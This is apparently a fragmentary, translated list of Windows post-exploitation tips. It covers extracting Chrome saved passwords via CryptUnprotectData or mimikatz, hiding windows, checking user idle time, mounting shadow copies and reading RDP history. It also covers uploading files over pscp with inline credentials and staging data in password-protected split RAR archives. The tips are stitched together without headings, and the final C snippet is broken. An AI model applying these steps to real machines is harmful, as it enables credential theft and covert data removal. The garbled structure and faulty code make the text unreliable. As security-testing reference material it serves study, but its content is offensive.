https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C
powershell:
https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1
Determine whether to open the screen saver:
Find the registry HKEY_CURRENT_USER\Control Panel\Desktop, if there is a key value SCRNSAVE.EXE.
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE
If the screen saver is turned on, check the key value ScreenSaveTimeOut to get the screen saver startup time (in seconds).
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut
Change window state via API ShowWindowAsync.
POC:
https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1
Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Note:
The directory of the 32-bit program under the 64-bit system is HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
POC:
https://github.com/3gstudent/ListInstalledPrograms
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
| Value | Meaning |
|---|---|
| 0 (0x0) | Unspecified |
| 1 (0x1) | Desktop |
| 2 (0x2) | Mobile |
| 3 (0x3) | Workstation |
| 4 (0x4) | Enterprise Server |
| 5 (0x5) | Small Office and Home Office (SOHO) Server |
| 6 (0x6) | Appliance PC |
| 7 (0x7) | Performance Server |
| 8 (0x8) | Maximum |
Method 1:
Read the database file %LocalAppData%\Google\Chrome\User Data\Default\Login Data. If the Chrome browser is running and cannot be read directly, you need to copy it first.
Direct decryption in the current system call API CryptUnprotectData.
Method 2:
mimikatz
vault::cred
Reference:
You do not need to obtain the user's plain text password when using the Master Key.
Reference:
《渗透技巧——利用Masterkey离线导出Chrome浏览器中保存的密码》
Query whether the current system has a snapshot:
vssadmin list shadows
Access the files in the history snapshot:
mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
dir c:\testvsc
Reference:
aa && bb
Execute aa, and then execute bb after success.
aa || bb
Execute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again.
aa & bb
Execute aa first and then bb, regardless of whether aa is successful.
Two methods, the code can refer to:
https://github.com/3gstudent/SendMail-with-Attachments
Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell
The default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with reg load.
The code can refer to:
https://github.com/3gstudent/ListInstalledPrograms
Reference:
《渗透技巧——获得Windows系统的远程桌面连接历史记录》
download link:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
The upload command is as follows:
pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
It will prompt whether to store the cache file.
Enter Y, create a new key in the registry: HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys, do not need to enter Y again for the next connection.
Enter N, do not save the registry key.
Implement the method of automatically entering the N command:
echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.
Note:
- WinXP and Win7,ObjectTypeNumber = 0x1c
- Win8 and later,ObjectTypeNumber = 0x1e
https://github.com/3gstudent/test/raw/master/rar.exe
Maximum compression ratio:
rar.exe a -m5 1.rar 1.txt -p123456
Volume compression, one compression package per 10MB:
rar.exe a -m5 -v10m 1.rar 1.txt -p123456
Decompression:
rar.exe e 1.rar -p123456
The /v parameter shows detailed information, which is helpful for collecting information.
WCHAR srcString[20] = L"I love you!";
WCHAR targetString[20];
wcsncpy_s(targetString, wcslen(targetString), srcString + 1, (wcslen(targetString) - 1);
wprintf_s(L"%s\n", targetString);